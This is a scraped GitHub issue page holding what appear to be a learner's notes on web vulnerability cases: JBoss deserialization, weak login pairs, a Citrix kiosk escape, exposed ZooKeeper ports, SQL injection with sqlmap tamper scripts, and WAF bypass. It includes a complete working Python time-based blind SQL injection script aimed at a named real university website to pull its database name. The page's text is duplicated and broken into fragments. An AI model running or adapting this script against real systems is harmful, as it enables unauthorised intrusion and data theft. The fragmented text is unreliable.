We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Young men's love then lies not truly in their hearts, but in their eyes.
JBoss
GetShell
abc@xxx.com
123@xxx
admin
123456
admin / )P:?9ol.8ik,&UJM
test / test123
baozoumanhua@sina.com / qwer1234
weblogic / weblogic123
CITRIX
Shift+F1
cmd
zookeeper
2181
ping
ip
nmap -p2181,2182 目标ip网段 -P0
Telnet
2181 open
SQL
sqlmap
randomcase.py
waitfor delay
# /usr/bin/env python # coding=utf-8 import httplib import time import string import sys import random import urllib headers = {'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',} payloads = list(string.ascii_lowercase) payloads += list(string.ascii_uppercase) for i in range(0,10): payloads.append(str(i)) payloads += ['@','_', '.', '-', '\\', ' '] print 'Try to retrive DB:' db = '' for i in range(1,13): for payload in payloads: #time.sleep(1) #间隔一秒 try: conn = httplib.HTTPConnection('meetc.ecust.edu.cn', timeout=5) s = "if(ascii(substring(db_name(),%s,1))=%s) waitfor delay '0:0:5' --" % (i, ord(payload)) params = "flag=11;" + urllib.quote(s)+"&info_lb=271" conn.request(method='GET', url= '/pictrue.aspx?' + params,headers = headers) html_doc = conn.getresponse().read() conn.close() print '.', except Exception, e: db += payload print '\n[In progress]', db break print '\n[Done] DB is:', db
Java
ID
Gitlab
Burp
WooyunWiKi
Tower
EasyPm
Worktile
Team
云之家
PHP
$uid = $_GET('uid')
$sql="select pay_id from ".PUSER." where userid='$uid'";
uid
trim
select
from
WAF
# --
bypass
GET
POST
.
txt
PoC
Pocsuite
Python
The text was updated successfully, but these errors were encountered:
No branches or pull requests
0x01 Wooyun
JBoss
反序列化漏洞GetShell
abc@xxx.com
/123@xxx
admin
/123456
admin / )P:?9ol.8ik,&UJM
(字典爆破,键盘斜着排列)test / test123
baozoumanhua@sina.com / qwer1234
weblogic / weblogic123
* 没有验证码设计,可以爆破
CITRIX
配置不当Shift+F1
调出任务管理器,启用cmd
,执行命令zookeeper
未配置权限2181
端口未做访问限制导致公网可以任意访问,操作ping
目标域名,得到ip
nmap -p2181,2182 目标ip网段 -P0
扫描Telnet
连接2181 open
SQL
注入sqlmap
使用randomcase.py
绕过waitfor delay
Java
反序列化漏洞GetShell
ID
换成他人ID
,就可以读取他人信息ID
,就可以重置他人子账号Gitlab
公开项目泄漏Burp
爆破弱口令用户,登录后,越权遍历订单WooyunWiKi
Tower
EasyPm
Worktile
Team
云之家
0x02 Seebug
PHP
代码审计 --SQL
注入$uid = $_GET('uid')
$sql="select pay_id from ".PUSER." where userid='$uid'";
uid
参数未做任何过滤,直接被带入到SQL
语句中进行查询,导致SQL
注入漏洞的产生trim
函数只是过滤了空格,参数没做其他过滤的话,直接被带入到SQL
语句中进行查询导致注入漏洞的产生select
和from
之前,那么只能截断来注入,如果无法截断的话,查看WAF
函数WAF
对# --
都做了过滤,如果对于本身就没被单引号保护的注入来说,想要像以前那样bypass
,要把注入语句构造在2个单引号之间才能bypass
GET
和POST
的过滤引用的函数,查看是否可以绕过0x03 Python
.
来判断是否为厂商网址txt
文件0x04 一天总结
PoC
,之后写点PoC
的入门教程(基于Pocsuite
)Python
题,这个坑近期也应该填上了The text was updated successfully, but these errors were encountered: